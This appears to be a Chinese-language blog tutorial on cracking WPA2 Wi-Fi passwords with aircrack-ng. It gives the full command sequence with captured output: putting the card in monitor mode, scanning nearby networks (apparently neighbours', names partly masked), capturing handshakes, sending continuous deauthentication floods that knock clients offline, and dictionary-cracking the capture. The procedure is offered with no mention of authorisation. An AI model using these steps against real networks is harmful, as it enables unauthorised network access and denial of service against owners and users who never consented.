使用aircrack-ng抓包
iwconfig命令查看无线网卡有没有加载成功,如图,出现了wlan0的无线设备,即为加载成功
root@kali:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
查看周围网络
airodump-ng wlan0
很多情况下会发生如下所示的报错:“ioctl(SIOCSIWMODE) failed: Device or resource busy”
这种情况我们需要先卸载设备,然后设置monitor模式,重新启用即可!命令:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
运行完这三个命令后再次运行airodump wlan0,查看需要破解的网在哪个频道(CH),数据传输量(Beacons)如何。
CH 9 ][ Elapsed: 1 min ][ 2017-01-12 23:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A4:**** -56 40 82 0 11 54e. WPA2 CCMP PSK M***ie
08:**** -63 200 0 0 6 54e WPA2 CCMP PSK N***ore_A**0BF
1C:**** -64 25 331 0 6 54e. WPA2 CCMP PSK T***S
F0:**** -64 18 797 0 11 54e WPA2 CCMP PSK X***mi_8029
C8:**** -76 13 0 0 9 54e WPA2 CCMP PSK Z***
E4:**** -80 19 0 0 11 54e. WPA2 CCMP PSK 6***
E4:**** -84 14 215 0 13 54e WPA2 CCMP PSK M***URY_1F04
EC:**** -84 13 0 0 1 54e. WPA2 CCMP PSK k***board
1C:**** -86 14 1 0 1 54e. WPA2 CCMP PSK T***INK_F369DE
C8:**** -88 10 36 0 10 54e WPA2 CCMP PSK T***a_5021
F0:**** -86 10 0 0 3 54e WPA2 CCMP PSK X***mi_B37C
04:**** -88 6 0 0 1 54e. WPA2 CCMP PSK J***322BEC
D0:**** -89 11 0 0 11 54e. OPN <***gth: 0>
88:**** -90 4 0 0 11 54e. WPA2 CCMP PSK z***yi
C4:**** -92 2 0 0 13 54e. WPA2 CCMP PSK D***nk_DIR-223
80:**** -94 5 0 0 6 54e. WPA2 CCMP PSK w***-8018
88:**** -94 6 0 0 11 54e. WPA2 CCMP PSK L***ndinter
8E:**** -94 4 0 0 11 54e. WPA2 CCMP PSK A***
30:**** -95 4 0 0 11 54e. WPA2 CCMP PSK J***u-NET
1C:**** -98 3 0 0 11 54e. WPA2 CCMP PSK M***URY_18C0
14:**** -95 2 0 0 11 54e. WPA2 CCMP PSK T***INK_8082
30:**** -96 3 0 0 6 54e. WPA2 CCMP PSK T***INK_6A28
D0:**** -89 4 0 0 11 54e. WPA2 CCMP PSK 3***ifi-QCMHZY-2.4G
BSSID STATION PWR Rate Lost Frames Probe
A4:**** B8:**** -72 0 -24e 0 7
A4:**** 80:**** -90 1e- 1 0 75
08:**** DC:**** -26 0 -24e 18 33
08:**** 54:**** -42 0 - 1 0 17 N**re_A***BF
1C:**** 94:**** -74 0e- 1 0 332
接下来开始抓我们想要的包:
airodump-ng -w sniffer -c 11 wlan0
解释:-w表示保存握手包,“sniffer”为包的名称,可随意设置,最终的文件为sniffer-01.cap,-c 3表示指定频道11,wlan0指定网卡设备。
当然我们也可以指定破解我们想要的AP
airodump-ng -w sniffer -c 11 --bssid F0:B4:**** wlan0
解释:--bssid嗅探指定无线AP,后面跟着AP的bssid,如下图
这时候可以等待握手包的获取。
为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包:
root@kali:~# aireplay-ng -0 0 -a F0:B4:**** wlan0
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值
23:26:08 Waiting for beacon frame (BSSID: F0:B4:****) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
23:26:08 Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:09 Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:09 Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
23:26:10 Sending DeAuth to broadcast -- BSSID: [F0:B4:****]
若上一步的窗口右上角中出现握手包,WPA handshake: F0:B4:**** 后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。
如果始终没有出现握手包,则可以尝试加入客户端的mac:
root@kali:~# aireplay-ng -0 0 -a F0:B4:**** -c 3C:33:**** wlan0
23:28:57 Waiting for beacon frame (BSSID: F0:B4:****) on channel 11
23:28:57 Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 5|64 ACKs]
23:28:58 Sending 64 directed DeAuth. STMAC: [3C:33:****] [ 0|52 ACKs]
23:28:59 Sending 64 directed DeAuth. STMAC: [3C:33:****] [52|59 ACKs]
使用字典爆破握手包
这一步是整个密码破解的关键,能否成功,取决与你的CPU是否强大,还有你字典的大小,以及字典的质量,密码的复杂程度。
aircrack-ng sniffer-01.cap -w /mnt/hgfs/D/Downloads/1.txt
解释:“sniffer-01.cap”为指定我们需要破解的握手包,直接写文件名表示文件在当前文件夹下,"-w"指定字典文件后面跟着字典的路径。
Aircrack-ng 1.2 rc4
[00:01:29] 56836/276301591 keys tested (661.85 k/s)
Time left: 4 days, 20 hours, 5 minutes, 19 seconds 0.02%
Current passphrase: 000055885588
Master Key : C9 8F 1E DA 11 AB E1 22 05 C0 CF 4B 39 BC 11 DF
BA AE 04 FE 5C D9 BC 5D 37 12 78 B7 2C 26 C0 FF
Transient Key : 05 A6 DB 82 4D 1C 42 AA D3 A9 DB 15 D6 CD 73 FB
CB A5 34 2B 5D 9A 59 3C 3B A7 7D 2C 75 05 9F 89
BA 3D 3F C6 2C C4 A4 84 83 45 AE 78 7E 0A 77 0F
41 DD 35 48 09 99 13 EA D6 80 BD 17 AE D2 E3 C8
EAPOL HMAC : 28 8D 48 F4 1D 48 E9 AC B9 FF B1 CB CF 8F 88 EB